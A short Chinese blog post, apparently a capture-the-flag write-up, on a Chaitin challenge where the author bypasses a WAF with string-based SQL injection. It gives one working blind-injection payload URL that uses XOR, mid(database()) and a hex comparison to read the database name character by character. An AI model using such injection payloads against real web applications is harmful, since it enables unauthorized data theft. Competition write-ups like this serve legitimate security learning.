有意思的一道题

长亭出题思路很广啊,666php

是一道绕waf的题,一开始被欺骗觉得是数字型注入,但过滤了不少很严格,最后才知道是字符型,哈哈哈,payload以下:tab

http://54.222.188.152:25718/index.php?id=1'^(mid(database()from(1)for(1))in(0x77))^'1#注入

看来之后仍是要多打打比赛,老年人不练练思路跟不上啊比赛

相关文章
相关标签/搜索